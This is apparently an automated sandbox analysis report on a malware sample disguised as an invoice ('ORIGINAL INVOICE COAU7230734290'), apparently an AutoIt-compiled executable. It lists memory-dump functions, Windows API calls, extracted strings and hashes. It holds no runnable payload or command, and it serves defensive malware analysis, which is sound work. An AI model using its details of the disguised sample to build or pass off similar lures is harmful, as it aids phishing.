                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                              • String ID:
                                                              • API String ID: 3869813825-0
                                                              • Opcode ID: 86180104de1551826fb9c5fbea5e1a1118eb9d0d54a67db572b82fdb9753d74b
                                                              • Instruction ID: 4d63f8ada6d6737c720faeab1aa22010a7350378d347bf3737e697b1a30dbd48
                                                              • Opcode Fuzzy Hash: 86180104de1551826fb9c5fbea5e1a1118eb9d0d54a67db572b82fdb9753d74b
                                                              • Instruction Fuzzy Hash: 83515E7190070AAFDB20DFA8ED89F6EBBF9FF04705F014918E546A26A0C774A954DF10
                                                              Function 002479B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 002479C6
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 002479D1
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 002479DC
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 002479E7
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 002479F2
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 002479FD
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00247A08
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00247A13
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00247A1E
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00247A29
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00247A34
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00247A3F
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00247A4A
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00247A55
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00247A60
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00247A6B
                                                              • GetCursorInfo.USER32(?), ref: 00247A7B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: 23a02546826f63c41267bc9ccd76049f51ee7146d471845d898892631df97053
                                                              • Instruction ID: 011cc24a53df762eab7c5b2f425581fd804f46182f5a29069a637ffc92e65549
                                                              • Opcode Fuzzy Hash: 23a02546826f63c41267bc9ccd76049f51ee7146d471845d898892631df97053
                                                              • Instruction Fuzzy Hash: B53113B0D0831AAADB109FB69C8995FBFE8FF04750F50452BE51DE7280DB78A5008FA1
                                                              Function 001FC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,001FC8B7,?,00002000,?,?,00000000,?,001F419E,?,?,?,0028DC00), ref: 0020E984
                                                                • Part of subcall function 001F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F53B1,?,?,001F61FF,?,00000000,00000001,00000000), ref: 001F662F
                                                              • __wsplitpath.LIBCMT ref: 001FC93E
                                                                • Part of subcall function 00211DFC: __wsplitpath_helper.LIBCMT ref: 00211E3C
                                                              • _wcscpy.LIBCMT ref: 001FC953
                                                              • _wcscat.LIBCMT ref: 001FC968
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 001FC978
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001FCABE
                                                                • Part of subcall function 001FB337: _wcscpy.LIBCMT ref: 001FB36F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 2258743419-1018226102
                                                              • Opcode ID: aeaa3506eb8b6e8b6bc74d31372b7e52c0b0a66905bc52857542c2e58180305a
                                                              • Instruction ID: a0d7a046c614e3790f49936463facfdf73fda817110a122cb582958c88292641
                                                              • Opcode Fuzzy Hash: aeaa3506eb8b6e8b6bc74d31372b7e52c0b0a66905bc52857542c2e58180305a
                                                              • Instruction Fuzzy Hash: 7D12D1715183459FC724EF24C981AAFBBE4BF99304F00491EF58993292DB30DA99DF92
                                                              Function 0025CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 0025CEFB
                                                              • DestroyWindow.USER32(?,?), ref: 0025CF73
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0025CFF4
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0025D016
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0025D025
                                                              • DestroyWindow.USER32(?), ref: 0025D042
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001F0000,00000000), ref: 0025D075
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0025D094
                                                              • GetDesktopWindow.USER32 ref: 0025D0A9
                                                              • GetWindowRect.USER32(00000000), ref: 0025D0B0
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0025D0C2
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0025D0DA
                                                                • Part of subcall function 0020B526: GetWindowLongW.USER32(?,000000EB), ref: 0020B537
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 3877571568-3619404913
                                                              • Opcode ID: 30bb2194109fde94c7bb23a599ccd296a56aa335c60ea562e27cce2824469bed
                                                              • Instruction ID: 9fec259d528d9f2205307b537caa90b2f2162873300d082a9c02071147c8abf4
                                                              • Opcode Fuzzy Hash: 30bb2194109fde94c7bb23a599ccd296a56aa335c60ea562e27cce2824469bed
                                                              • Instruction Fuzzy Hash: 4671CDB0160306AFD724CF28DC88F6677E9EB88704F54451DFA858B2A1D770E866CB16
                                                              Function 0025F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • DragQueryPoint.SHELL32(?,?), ref: 0025F37A
                                                                • Part of subcall function 0025D7DE: ClientToScreen.USER32(?,?), ref: 0025D807
                                                                • Part of subcall function 0025D7DE: GetWindowRect.USER32(?,?), ref: 0025D87D
                                                                • Part of subcall function 0025D7DE: PtInRect.USER32(?,?,0025ED5A), ref: 0025D88D
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0025F3E3
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0025F3EE
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0025F411
                                                              • _wcscat.LIBCMT ref: 0025F441
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0025F458
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0025F471
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0025F488
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0025F4AA
                                                              • DragFinish.SHELL32(?), ref: 0025F4B1
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0025F59C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: 1e0771f73845443653f89f8b5f5551168eb7754a52aec2c07deecb5d06ad3d42
                                                              • Instruction ID: aa93345a7daa7c1e9674667a8cb3e25ee86d2444576cadd19a5dfc90e6acfe3d
                                                              • Opcode Fuzzy Hash: 1e0771f73845443653f89f8b5f5551168eb7754a52aec2c07deecb5d06ad3d42
                                                              • Instruction Fuzzy Hash: 2F616B71008305AFC311EF60DC89DAFBBF8BF99710F400A1EF695921A1DB709A59CB52
                                                              Function 0023AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(00000000), ref: 0023AB3D
                                                              • VariantCopy.OLEAUT32(?,?), ref: 0023AB46
                                                              • VariantClear.OLEAUT32(?), ref: 0023AB52
                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0023AC40
                                                              • __swprintf.LIBCMT ref: 0023AC70
                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0023AC9C
                                                              • VariantInit.OLEAUT32(?), ref: 0023AD4D
                                                              • SysFreeString.OLEAUT32(00000016), ref: 0023ADDF
                                                              • VariantClear.OLEAUT32(?), ref: 0023AE35
                                                              • VariantClear.OLEAUT32(?), ref: 0023AE44
                                                              • VariantInit.OLEAUT32(00000000), ref: 0023AE80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                              • API String ID: 3730832054-3931177956
                                                              • Opcode ID: aa09aac711a19a1c6e8baee12d4d2b5ddb4ad590bcf623ac17c984ce0e189a32
                                                              • Instruction ID: 658e9b4372215989eddc03d5c0b057509f38d13fc962dff7e0fa1378d13412e7
                                                              • Opcode Fuzzy Hash: aa09aac711a19a1c6e8baee12d4d2b5ddb4ad590bcf623ac17c984ce0e189a32
                                                              • Instruction Fuzzy Hash: 4CD116B1620206DBCB209F69D885B7EF7B6FF05700F148476E4859B191DBB4EC60DBA2
                                                              Function 0025716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 002571FC
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00257247
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 2abd2234c4dc8db0548e86ebe3dbb3852325a8124105efb1e3ab5ff8ef831d13
                                                              • Instruction ID: 9aca21be625839a0c956642b244c4fdb470f6b0d636030f8b2a48fad6933f0cd
                                                              • Opcode Fuzzy Hash: 2abd2234c4dc8db0548e86ebe3dbb3852325a8124105efb1e3ab5ff8ef831d13
                                                              • Instruction Fuzzy Hash: 34919D742283019BCB04EF20D851A6EB7A5BF94310F10485DFD966B3A3DB71ED6ACB85
                                                              Function 0022CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0022CF50), ref: 0022CE90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: 4+*$CLASS$CLASSNN$H+*$INSTANCE$L+*$NAME$P+*$REGEXPCLASS$T+*$TEXT
                                                              • API String ID: 3555792229-168737517
                                                              • Opcode ID: 254ef6e6a4c52de9063458396b14b694f7998bd72a62ea8900340b088a79bb88
                                                              • Instruction ID: 5e9d9e15d2054ff23e9c915e01bbd49186bb239bc9d0b4dabc8d6957a0eae01c
                                                              • Opcode Fuzzy Hash: 254ef6e6a4c52de9063458396b14b694f7998bd72a62ea8900340b088a79bb88
                                                              • Instruction Fuzzy Hash: 9891A330620216ABDB18DFA0D481BEEFB75BF14304F61851AE949A7191DF7069B9CBE0
                                                              Function 0025E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0025E5AB
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0025BEAF), ref: 0025E607
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0025E647
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0025E68C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0025E6C3
                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0025BEAF), ref: 0025E6CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0025E6DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,0025BEAF), ref: 0025E6EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0025E70B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0025E717
                                                                • Part of subcall function 00210FA7: __wcsicmp_l.LIBCMT ref: 00211030
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 1d4c84ccd3f3bd9a9f33cb73bebe98324c882ab52044d0560487b5f8a6fee04b
                                                              • Instruction ID: d8c09fac4ef8ccee7b93144d5529ed6518d1eed477e43610c177b18f8fee4b9e
                                                              • Opcode Fuzzy Hash: 1d4c84ccd3f3bd9a9f33cb73bebe98324c882ab52044d0560487b5f8a6fee04b
                                                              • Instruction Fuzzy Hash: 5361F07152021ABAEF28DF24DC86FBE77ACBF14765F104105F915D60D0EBB09AA4CBA4
                                                              Function 0023D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • CharLowerBuffW.USER32(?,?), ref: 0023D292
                                                              • GetDriveTypeW.KERNEL32 ref: 0023D2DF
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0023D327
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0023D35E
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0023D38C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1148790751-4113822522
                                                              • Opcode ID: ff8f5a8d6487da2591613bfd0330b8e0e5ff3a83fdef4f79882605e64a821faf
                                                              • Instruction ID: 1916c69001ac70b133a020091f97dad0f5582479a0b838c0f3d838a35e5f8d70
                                                              • Opcode Fuzzy Hash: ff8f5a8d6487da2591613bfd0330b8e0e5ff3a83fdef4f79882605e64a821faf
                                                              • Instruction Fuzzy Hash: 81514AB16143099FC700EF20D98196AB7F4EF99758F00485DF98967292DB31AE1ACF82
                                                              Function 002326BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00263973,00000016,0000138C,00000016,?,00000016,0028DDB4,00000000,?), ref: 002326F1
                                                              • LoadStringW.USER32(00000000,?,00263973,00000016), ref: 002326FA
                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00263973,00000016,0000138C,00000016,?,00000016,0028DDB4,00000000,?,00000016), ref: 0023271C
                                                              • LoadStringW.USER32(00000000,?,00263973,00000016), ref: 0023271F
                                                              • __swprintf.LIBCMT ref: 0023276F
                                                              • __swprintf.LIBCMT ref: 00232780
                                                              • _wprintf.LIBCMT ref: 00232829
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00232840
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 618562835-2268648507
                                                              • Opcode ID: 7373d0b534bec123ce1cbfad3d9cf470733e49ad45656a651a9841fe445ca5c3
                                                              • Instruction ID: f388f32454ec68d990c935ad9fd9c8fb495d710562f4e9031104fe3d78430353
                                                              • Opcode Fuzzy Hash: 7373d0b534bec123ce1cbfad3d9cf470733e49ad45656a651a9841fe445ca5c3
                                                              • Instruction Fuzzy Hash: 08411F7280021DAACB14FBE0DE86DFEB779AF65344F100065B60576092EB706F59DBA0
                                                              Function 0023D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0023D0D8
                                                              • __swprintf.LIBCMT ref: 0023D0FA
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0023D137
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0023D15C
                                                              • _memset.LIBCMT ref: 0023D17B
                                                              • _wcsncpy.LIBCMT ref: 0023D1B7
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0023D1EC
                                                              • CloseHandle.KERNEL32(00000000), ref: 0023D1F7
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0023D200
                                                              • CloseHandle.KERNEL32(00000000), ref: 0023D20A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 8a54ae71355ebd0b00b3dd30c251366eb2d74c04f7edece3d469769590717268
                                                              • Instruction ID: 95b115f9b8a467f4e35a6d41ab069320182a16c22676264a2116d6fe6b0cc2df
                                                              • Opcode Fuzzy Hash: 8a54ae71355ebd0b00b3dd30c251366eb2d74c04f7edece3d469769590717268
                                                              • Instruction Fuzzy Hash: FB3170B291010AABDB21DFA0EC49FEB77BDEF89740F5040B6F90DD2161E77096958B24
                                                              Function 0025E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0025BEF4,?,?), ref: 0025E754
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E76B
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E776
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E783
                                                              • GlobalLock.KERNEL32(00000000), ref: 0025E78C
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E79B
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0025E7A4
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E7AB
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E7BC
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0027D9BC,?), ref: 0025E7D5
                                                              • GlobalFree.KERNEL32(00000000), ref: 0025E7E5
